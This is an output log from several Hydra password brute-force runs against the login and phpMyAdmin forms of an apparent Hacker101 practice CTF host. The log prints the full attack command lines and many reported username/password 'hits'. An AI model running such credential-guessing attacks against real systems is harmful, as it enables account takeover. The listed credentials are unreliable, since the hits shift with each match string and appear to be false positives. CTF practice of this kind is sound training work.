# Hydra v9.3 run at 2022-10-23 16:14:23 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -s 443 -o scans/hydra_login_fasttrack e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/login:username=^USER^&password=^PASS^:Username/Password Combination is invalid)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2013
# Hydra v9.3 run at 2022-10-23 16:15:43 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -s 443 -o scans/hydra_login_fasttrack e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/login:username=^USER^&password=^PASS^:invalid)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2016
# Hydra v9.3 run at 2022-10-23 16:16:10 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -s 443 -o scans/hydra_login_fasttrack -e nsr e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/login:username=^USER^&password=^PASS^:invalid)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: grinch
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: hcnirg
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: xam
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: max
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2015
# Hydra v9.3 run at 2022-10-23 16:20:18 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -s 443 -o scans/hydra_login_fasttrack -e nsr e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/login:username=^USER^&password=^PASS^:200 OK)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: grinch
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: hcnirg
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: max
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: xam
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2014
# Hydra v9.3 run at 2022-10-23 16:20:25 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -s 443 -o scans/hydra_login_fasttrack -e nsr e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/login:username=^USER^&password=^PASS^:200)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: grinch
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: hcnirg
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: max
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: xam
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2015
# Hydra v9.3 run at 2022-10-23 16:20:34 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -P /usr/share/wordlists/fasttrack.txt -s 443 -o scans/hydra_login_fasttrack e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/login:username=^USER^&password=^PASS^:Username/Password Combination is invalid)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: Summer2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2017
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: spring2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2016
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2014
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2013
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: Summer2015
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: summer2017
# Hydra v9.3 run at 2022-10-23 16:44:07 on e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form (hydra -L usernames.txt -p notthepassword -s 443 -o scans/hydra_login_fasttrack e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com http-post-form /forum/phpmyadmin/:username=^USER^&password=^PASS^:Invalid username and password combination)
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: grinch   password: notthepassword
[443][http-post-form] host: e767bf2aacc980fbd0f06fdbd28f949f.ctf.hacker101.com   login: max   password: notthepassword
